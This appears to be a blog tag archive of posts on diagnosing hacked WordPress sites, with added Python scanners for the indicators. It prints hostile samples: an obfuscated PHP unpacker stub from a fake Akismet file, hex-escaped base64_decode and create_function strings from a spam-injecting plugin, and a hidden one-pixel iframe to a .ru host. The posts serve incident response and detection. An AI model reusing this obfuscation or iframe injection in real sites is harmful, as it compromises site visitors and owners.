Tag Archives: hack

Akismet Hacked

If your WordPress site has been compromised, check your Akismet plugin. It’s so commonly used that it’s often subject to attacks. If any of these files are showing up in your plugins folder, you may be the subject of an attack:

- .akismet.cache.php
- .akismet.bak.php
- .akismet.old.php
- class-akismet.php
- db-akismet.php

One akismet.php file that I found started out something like this:

```php
<?php
// Unpacker stub: base64-decodes its argument, then expands a flag-bit compressed stream.
if (!function_exists("TC9A16C47DA8EEE87")) {
    function TC9A16C47DA8EEE87($T059EC46CFE335260) {
        $T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
        $TC9A16C47DA8EEE87 = 0;
        $TA7FB8B0A1C0E2E9E = 0;
        $T17D35BB9DF7A47E4 = 0;
        $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
        $TBF14159DC7D007D3 = 3;
        $T77605D5F26DD5248 = 0;
        $T4A747C3263CA7A55 = 16;
        $T7C7E72B89B83E235 = "";
        $T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
        $T43D5686285035C13 = __FILE__;
        $T43D5686285035C13 = file_get_contents($T43D5686285035C13);
        $T6BBC58A3B5B11DC4 = 0;
        // The pattern decodes to /(print|sprint|echo)/ and is matched against this file's own source.
        preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
        for (; $TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E;) {
            // Stop if the self-check above matched.
            if (count($T6BBC58A3B5B11DC4)) exit;
            if ($T4A747C3263CA7A55 == 0) {
                $T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                $T65CE9F6823D588A7 += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
                $T4A747C3263CA7A55 = 16;
            }
            if ($T65CE9F6823D588A7 & 0x8000) {
                $TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
                $TC9A16C47DA8EEE87 += (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
                if ($TC9A16C47DA8EEE87) {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
                    for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T17D35BB9DF7A47E4++)
                        $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
                    $T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
                } else {
                    $TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
                    $TA7FB8B0A1C0E2E9E += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
                    for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
                    $TBF14159DC7D007D3++;
                    $T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
                }
            } else
                $T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
            $T65CE9F6823D588A7 <<= 1;
            $T4A747C3263CA7A55--;
            if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
                // Input exhausted: return the unpacked text prefixed with "?>".
                $T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
                $T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
                return $T43D5686285035C13;
            }
        }
    }
};
?>
```

If you want the PHP code, which is obfuscated, for the akismet.php file I came …
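A scanner for the indicators described above, added here as an example (it is not code from the original post): it matches the listed file names, fingerprints the stub by its `T` + 16-hex-digit identifiers, and decodes string literals passed to `base64_decode` without executing anything. The threshold of five identifiers, the function names and the sample input are assumptions made for illustration.

```python
import base64
import os
import re

# File names the post lists as signs of a fake Akismet file.
IOC_NAMES = {".akismet.cache.php", ".akismet.bak.php", ".akismet.old.php",
             "class-akismet.php", "db-akismet.php"}
# The stub names its function and variables "T" + 16 upper-case hex digits.
HEX_IDENT = re.compile(rb"\bT[0-9A-F]{16}\b")
# String literals passed straight to base64_decode(); decoding them is harmless.
B64_ARG = re.compile(rb"""base64_decode\(\s*["']([A-Za-z0-9+/=]{8,})["']\s*\)""")
MIN_IDENTS = 5  # assumed threshold, tune against your own code base

def scan_source(name: str, source: bytes) -> dict:
    """Score one PHP file by name and content without executing it."""
    decoded = []
    for arg in B64_ARG.findall(source):
        try:
            decoded.append(base64.b64decode(arg, validate=True).decode("latin-1"))
        except ValueError:
            continue  # not valid base64
    return {
        "ioc_name": os.path.basename(name) in IOC_NAMES,
        "obfuscated": len(set(HEX_IDENT.findall(source))) >= MIN_IDENTS,
        "decoded_literals": decoded,
    }

def scan_tree(root: str) -> list:
    """Return (path, report) for each .php file under root that trips a check."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in (f for f in files if f.endswith(".php")):
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                report = scan_source(path, fh.read())
            if report["ioc_name"] or report["obfuscated"]:
                hits.append((path, report))
    return hits

# Constructed sample: a few lines in the style of the stub shown in the post.
SAMPLE = b'''<?php if (!function_exists("TC9A16C47DA8EEE87")) {
function TC9A16C47DA8EEE87($T059EC46CFE335260) {
$T65CE9F6823D588A7 = 0; $TBF14159DC7D007D3 = 3; $T77605D5F26DD5248 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $m);
'''

if __name__ == "__main__":
    print(scan_source("wp-content/plugins/akismet/db-akismet.php", SAMPLE))
```

Run `scan_tree` against `wp-content/plugins` and compare any hit with a fresh copy of the plugin from the official repository before deleting it.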

Posted in Security, Web Development | 1 Comment

Accutane WordPress Hack

If your WordPress site is showing “Buy Accutane Online” in the Google results, it’s because one of the plugins you’re using is not safe. One plugin known for this exploit is the “My Page Order” plugin by geekyweekly. I’d suggest removing the plugin altogether. You’ll notice that the page source is clean if you view it yourself, as the plugin only affects the page when the Google bot is viewing it. The function uses two strings written as hex-escaped character values:

```php
$unique_id = "\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65";
$unique_hash = "\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e";
```

Those translate into base64_decode and create_function respectively, two functions you don’t want to see in any plugin or theme; they are usually responsible for maladies. You should also check your server logs for “wxdGrgPB”, as that is the POST/GET variable used to send malicious commands to this script.
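The check described above, written out as an added example (not code from the original post or from the plugin): it resolves hex and octal escapes in PHP double-quoted strings, reports literals that spell one of the two function names, and filters access-log lines for the `wxdGrgPB` parameter. The function names, the plugin snippet around the two strings and the log lines are constructed for illustration.

```python
import re

HIDDEN_SINKS = {"base64_decode", "create_function"}  # the two names in the post
MARKER = "wxdGrgPB"  # request parameter named in the post

DQ_STRING = re.compile(r'"((?:[^"\\]|\\.)*)"')
# One escape: \xHH, octal \NNN, or any other backslash pair (left as it is).
ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(.))", re.S)

def decode_php_escapes(literal: str) -> str:
    """Resolve hex and octal escapes as PHP does inside double quotes."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)
        return m.group(0)
    return ESCAPE.sub(repl, literal)

def find_hidden_sinks(php_source: str) -> list:
    """Return (line_no, decoded_name) for escaped literals that spell a sink."""
    hits = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for m in DQ_STRING.finditer(line):
            decoded = decode_php_escapes(m.group(1))
            if decoded != m.group(1) and decoded.lower() in HIDDEN_SINKS:
                hits.append((no, decoded))
    return hits

def requests_with_marker(log_lines, marker: str = MARKER) -> list:
    """Return access-log lines whose query string carries the marker parameter."""
    pat = re.compile(r"[?&]" + re.escape(marker) + r"=")
    return [ln for ln in log_lines if pat.search(ln)]

# Constructed samples: the post's two strings in a made-up plugin file, and
# made-up access-log lines (documentation IP range).
PHP_SAMPLE = r'''<?php
$label = "My Page Order";
$unique_id = "\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65";
$unique_hash = "\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e";
'''
LOG_SAMPLE = [
    '203.0.113.9 - - [01/Jan/2012:10:00:00 +0000] "GET /?p=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2012:10:00:05 +0000] "GET /?wxdGrgPB=x HTTP/1.1" 200 17',
]

if __name__ == "__main__":
    print(find_hidden_sinks(PHP_SAMPLE))
    print(requests_with_marker(LOG_SAMPLE))
```

Standard access logs record the query string but not POST bodies, so the log filter only catches uses of the parameter sent via GET.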

Posted in Tech Tips, Web Development

Fix “pakcyberarmy.net” Website Hack

If you are seeing this code, your website has been hacked:

~ Call 911 y0u g0t Hacked by Pak Cyber Army ~ <=Shak=> ~

If your website has been hacked and the pakcyberarmy.net spam is showing up, this is how you can fix it:

This exploit usually only affects the root index file, perhaps index.html or index.php. Restore this file to a saved, earlier version, or rename it to something like index.txt or index.bak if you need to start from scratch. You may also want to look at the file-modification time to see when the file was last modified, to get some idea of when the attack occurred. You should check the server logs and look for suspicious FTP activity or unusual HTTP requests, especially ones with GET parameters or POST data. You should also check your .htaccess file for rewrite rules that redirect visitors.

If you have shell access, run this command to see all files changed within the last 24 hours (`-mtime` counts in whole days, so `-1` means less than one day ago):

```
find ~ -type f -mtime -1
```

You can change ~ to ~/www or the path to your web root as needed.
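For the .htaccess step above, an added example (not from the original post) that lists every `RewriteRule` or `Redirect` directive pointing at a host other than your own, together with the `RewriteCond` lines that gate it. The host names and the sample .htaccess content are constructed placeholders.

```python
import re
from urllib.parse import urlparse

COND = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)", re.I)
# mod_alias: Redirect / RedirectMatch / RedirectPermanent / RedirectTemp; target is last.
ALIAS = re.compile(r"^\s*Redirect(?:Match|Permanent|Temp)?\s+.*?(\S+)\s*$", re.I)

def external_redirects(htaccess_text: str, own_hosts) -> list:
    """List directives that send visitors to a host outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, pending = [], []
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        cond = COND.match(line)
        if cond:  # conditions apply to the next RewriteRule
            pending.append(cond.group(1) + " " + cond.group(2))
            continue
        rule, alias = RULE.match(line), ALIAS.match(line)
        if rule:
            target, conds, pending = rule.group(2), pending, []
        elif alias:
            target, conds = alias.group(1), []
        else:
            continue
        host = urlparse(target).hostname
        if host and host.lower() not in own:
            findings.append({"line": no, "host": host.lower(), "conditions": conds})
    return findings

# Constructed sample: the stock WordPress block followed by an injected rule.
HTACCESS_SAMPLE = r"""# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
RewriteCond %{HTTP_REFERER} (google|bing|yahoo) [NC]
RewriteRule ^(.*)$ http://redirect.example/in.php?s=$1 [R=302,L]
"""

if __name__ == "__main__":
    for finding in external_redirects(HTACCESS_SAMPLE, {"myblog.example"}):
        print(finding)
```

A rule whose conditions test the referer or user agent explains why the site can look normal when you type the address in directly.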

Posted in Tech Tips, Web Development


I’m getting errors in my log file with “sadeferxaa” in the URL request:

```
IP:
Page Requested: /index.php?page=sadeferxaa
Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)
```

WordPress was also compromised with the following data injected at the end of some files:

```html
<html><body><iframe src="http://eftpsid0342943.ru/contacts/s3" width=1 height=1></iframe></body></html>
```

I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.
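A detector for the injection pattern shown above, added as an example (not code from the original post): it finds iframes that are invisible (0 or 1 pixel, or hidden by style) and reports whether nothing but closing tags follows them to the end of the file. The function names and both sample inputs are constructed, and the hosts in them are placeholders.

```python
import re
from urllib.parse import urlparse

IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r'''([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))''')
# Only closing tags and whitespace up to end of file.
TAIL = re.compile(r"(?:\s*</[a-z0-9]+\s*>)*\s*\Z", re.I)

def _attrs(tag_body: str) -> dict:
    """Parse quoted or bare attribute values into a dict with lower-case keys."""
    return {m.group(1).lower(): next(g for g in m.groups()[1:] if g is not None)
            for m in ATTR.finditer(tag_body)}

def _tiny(value) -> bool:
    """True for a dimension of 0 or 1, e.g. '1', '0' or '1px'."""
    m = re.match(r"\s*(\d+)", value or "")
    return bool(m) and int(m.group(1)) <= 1

def hidden_iframes(text: str) -> list:
    """Return invisible iframes, their source host, and whether they end the file."""
    findings = []
    for m in IFRAME.finditer(text):
        a = _attrs(m.group(1))
        style = a.get("style", "").replace(" ", "").lower()
        hidden = ((_tiny(a.get("width")) and _tiny(a.get("height")))
                  or "display:none" in style or "visibility:hidden" in style)
        if hidden:
            findings.append({
                "host": urlparse(a.get("src", "")).hostname,
                "at_end_of_file": TAIL.match(text, m.end()) is not None,
            })
    return findings

# Constructed samples; injected.example and video.example are placeholder hosts.
INFECTED = ('<?php\nrequire "wp-blog-header.php";\n?>\n'
            '<html><body><iframe src="http://injected.example/contacts/s3" '
            'width=1 height=1></iframe></body></html>\n')
CLEAN = ('<p>Intro</p><iframe src="https://video.example/embed/1" '
         'width="560" height="315"></iframe><p>More text</p>')

if __name__ == "__main__":
    print(hidden_iframes(INFECTED))
    print(hidden_iframes(CLEAN))
```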

Posted in Tech Tips | 3 Comments